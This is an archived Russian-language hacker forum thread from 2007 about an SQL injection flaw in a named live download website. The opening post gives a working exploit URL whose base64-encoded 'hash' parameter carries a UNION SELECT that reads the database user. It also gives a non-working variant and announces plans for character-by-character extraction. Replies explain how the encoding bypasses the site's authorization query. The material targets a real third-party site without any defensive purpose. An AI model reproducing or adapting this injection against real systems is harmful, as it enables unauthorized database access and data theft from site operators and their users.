Crazy SQL :)

Discussion in 'Уязвимости' started by guest3297, 2 Feb 2007.

  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Я тут потихонечку ищу новые реализации sql иньекций...
    Нашел довольно забавный движок...
    Очень порадовало вообщем :)

    Рабочая иньекция.
    Code:
    http://www.zakachay.com/?action=regconf&hash=MTonLyoqL3VuaW9uLyoqL3NlbGVjdC8qKi8xLDIsdXNlcigpLDQsNSw2LDcsOCw5LDEvKjox
    Не рабочая
    Code:
    http://www.zakachay.com/?action=regconf&hash=MTonLyoqL3VuaW9uLyoqL3NlbGVjdC8qKi8xLDIsbG9sZWcsNCw1LDYsNyw4LDksMS8qOjE
    Реализовать можно только посимвольный перебор чем щас и займусь :)

    Разбирайтесь :)
     
    #1 guest3297, 2 Feb 2007
    4 people like this.
  2. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    Круто, тока я не врубаюсь, что там не даёт использовать функцию user()?
     
    #2 Termin@L, 2 Feb 2007
    1 person likes this.
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2Termin@L
    :) ыыыыыы
     
    #3 guest3297, 2 Feb 2007
  4. Ig-FoX

    Ig-FoX Elder - Старейшина

    Joined:
    28 Jul 2005
    Messages:
    60
    Likes Received:
    7
    Reputations:
    -2
    Я чтото не пойму вчем суть этой sql inj? Там параметры шыфруются и чтоли?
     
    #4 Ig-FoX, 2 Feb 2007
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    кодируються
     
    #5 guest3297, 2 Feb 2007
  6. Ig-FoX

    Ig-FoX Elder - Старейшина

    Joined:
    28 Jul 2005
    Messages:
    60
    Likes Received:
    7
    Reputations:
    -2
    Для чего они воще кодируются?
     
    #6 Ig-FoX, 2 Feb 2007
  7. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    base64 зашифрованный пароль, который, декодируется, и после этого вставляется в mysql запрос, я так понял служит, кк авторизация. А [cash] просто зашифровал в бэйс64, запрос с union, и всё
    2 [cash] ну дак почему, ни хъя не получается, сори если туплю, вечер как никак...
     
    #7 Termin@L, 2 Feb 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.